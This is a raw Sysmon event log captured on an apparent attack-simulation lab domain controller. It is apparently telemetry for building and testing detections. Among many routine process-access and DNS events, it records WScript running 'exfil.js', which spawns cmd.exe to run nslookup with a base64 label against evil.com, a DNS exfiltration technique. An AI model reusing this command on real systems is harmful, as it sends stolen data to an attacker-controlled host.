14:16:30.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.433{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4F40-000000005F02}7992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.433{2E1864BB-17BE-629A-4D40-000000005F02}75644156C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-4F40-000000005F02}7992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.438{2E1864BB-17BE-629A-4F40-000000005F02}7992C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-4D40-000000005F02}7564C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfadpvv.tmp 2>&1 10341000x8000000000000000200088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.365{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4E40-000000005F02}2872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.365{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4E40-000000005F02}2872C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.365{2E1864BB-17BE-629A-4E40-000000005F02}2872660C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4D40-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52677- 354300x8000000000000000200084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{00000000-0000-0000-0000-000000000000}5908<unknown process>-udptruefalse127.0.0.1-52677-false127.0.0.1-53domain 354300x8000000000000000200083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.312{00000000-0000-0000-0000-000000000000}7396<unknown process>-udpfalsefalse127.0.0.1-52676-false127.0.0.1-53domain 354300x8000000000000000200082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.312{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52676- 354300x8000000000000000200081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.312{00000000-0000-0000-0000-000000000000}7396<unknown process>-udptruefalse127.0.0.1-52676-false127.0.0.1-53domain 354300x8000000000000000200080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.312{00000000-0000-0000-0000-000000000000}7396<unknown process>-udpfalsefalse127.0.0.1-52675-false127.0.0.1-53domain 354300x8000000000000000200079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.312{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52675- 354300x8000000000000000200078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.312{00000000-0000-0000-0000-000000000000}7396<unknown process>-udptruefalse127.0.0.1-52675-false127.0.0.1-53domain 354300x8000000000000000200077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.311{00000000-0000-0000-0000-000000000000}7396<unknown process>-udpfalsefalse127.0.0.1-52674-false127.0.0.1-53domain 354300x8000000000000000200076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.311{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52674- 354300x8000000000000000200075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.158{00000000-0000-0000-0000-000000000000}2308<unknown process>-udpfalsefalse127.0.0.1-52673-false127.0.0.1-53domain 354300x8000000000000000200074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52673- 354300x8000000000000000200073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.158{00000000-0000-0000-0000-000000000000}2308<unknown process>-udptruefalse127.0.0.1-52673-false127.0.0.1-53domain 354300x8000000000000000200072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.031{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52672- 354300x8000000000000000200071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.030{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52671- 354300x8000000000000000200070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.030{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52670- 354300x8000000000000000200069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.030{00000000-0000-0000-0000-000000000000}3796<unknown process>-udptruefalse127.0.0.1-52670-false127.0.0.1-53domain 354300x8000000000000000200068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.887{00000000-0000-0000-0000-000000000000}1676<unknown process>-udpfalsefalse127.0.0.1-52669-false127.0.0.1-53domain 354300x8000000000000000200067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.886{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52669- 354300x8000000000000000200066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.885{00000000-0000-0000-0000-000000000000}1676<unknown process>-udpfalsefalse127.0.0.1-52668-false127.0.0.1-53domain 354300x8000000000000000200065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.885{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52668- 354300x8000000000000000200064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.884{00000000-0000-0000-0000-000000000000}1676<unknown process>-udptruefalse127.0.0.1-52668-false127.0.0.1-53domain 354300x8000000000000000200063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.884{00000000-0000-0000-0000-000000000000}1676<unknown process>-udpfalsefalse127.0.0.1-52667-false127.0.0.1-53domain 354300x8000000000000000200062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.882{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52667- 354300x8000000000000000200061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.882{00000000-0000-0000-0000-000000000000}1676<unknown process>-udptruefalse127.0.0.1-52667-false127.0.0.1-53domain 354300x8000000000000000200060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.762{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56351-false10.0.1.12-8000- 354300x8000000000000000200059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.757{00000000-0000-0000-0000-000000000000}7632<unknown process>-udpfalsefalse127.0.0.1-52666-false127.0.0.1-53domain 354300x8000000000000000200058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.757{00000000-0000-0000-0000-000000000000}7632<unknown process>-udptruefalse127.0.0.1-52666-false127.0.0.1-53domain 10341000x8000000000000000200057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.350{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4E40-000000005F02}2872C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000200056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.757{00000000-0000-0000-0000-000000000000}7632<unknown process>-udpfalsefalse127.0.0.1-52665-false127.0.0.1-53domain 354300x8000000000000000200055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.757{00000000-0000-0000-0000-000000000000}7632<unknown process>-udptruefalse127.0.0.1-52665-false127.0.0.1-53domain 354300x8000000000000000200054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.756{00000000-0000-0000-0000-000000000000}7632<unknown process>-udpfalsefalse127.0.0.1-52664-false127.0.0.1-53domain 354300x8000000000000000200053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.756{00000000-0000-0000-0000-000000000000}7632<unknown process>-udptruefalse127.0.0.1-52664-false127.0.0.1-53domain 354300x8000000000000000200052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{00000000-0000-0000-0000-000000000000}7292<unknown process>-udpfalsefalse127.0.0.1-52663-false127.0.0.1-53domain 354300x8000000000000000200051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{00000000-0000-0000-0000-000000000000}7292<unknown process>-udptruefalse127.0.0.1-52663-false127.0.0.1-53domain 354300x8000000000000000200050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{00000000-0000-0000-0000-000000000000}7292<unknown process>-udpfalsefalse127.0.0.1-52662-false127.0.0.1-53domain 354300x8000000000000000200049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{00000000-0000-0000-0000-000000000000}7292<unknown process>-udptruefalse127.0.0.1-52662-false127.0.0.1-53domain 354300x8000000000000000200048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{00000000-0000-0000-0000-000000000000}7292<unknown process>-udpfalsefalse127.0.0.1-52661-false127.0.0.1-53domain 354300x8000000000000000200047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{00000000-0000-0000-0000-000000000000}7292<unknown process>-udptruefalse127.0.0.1-52661-false127.0.0.1-53domain 354300x8000000000000000200046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.599{00000000-0000-0000-0000-000000000000}4192<unknown process>-udpfalsefalse127.0.0.1-52660-false127.0.0.1-53domain 354300x8000000000000000200045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{00000000-0000-0000-0000-000000000000}4192<unknown process>-udptruefalse127.0.0.1-52660-false127.0.0.1-53domain 354300x8000000000000000200044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{00000000-0000-0000-0000-000000000000}4192<unknown process>-udpfalsefalse127.0.0.1-52659-false127.0.0.1-53domain 354300x8000000000000000200043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{00000000-0000-0000-0000-000000000000}4192<unknown process>-udptruefalse127.0.0.1-52659-false127.0.0.1-53domain 10341000x8000000000000000200042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.334{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{00000000-0000-0000-0000-000000000000}4192<unknown process>-udpfalsefalse127.0.0.1-52658-false127.0.0.1-53domain 354300x8000000000000000200040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{00000000-0000-0000-0000-000000000000}4192<unknown process>-udptruefalse127.0.0.1-52658-false127.0.0.1-53domain 10341000x8000000000000000200039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.334{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.334{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.334{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.334{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4D40-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.334{2E1864BB-17A1-629A-783D-000000005F02}55527296C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-4D40-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.338{2E1864BB-17BE-629A-4D40-000000005F02}7564C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfadpvv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.318{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrncbyh.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.280{2E1864BB-17BE-629A-4B40-000000005F02}26203736C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4C40-000000005F02}2040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 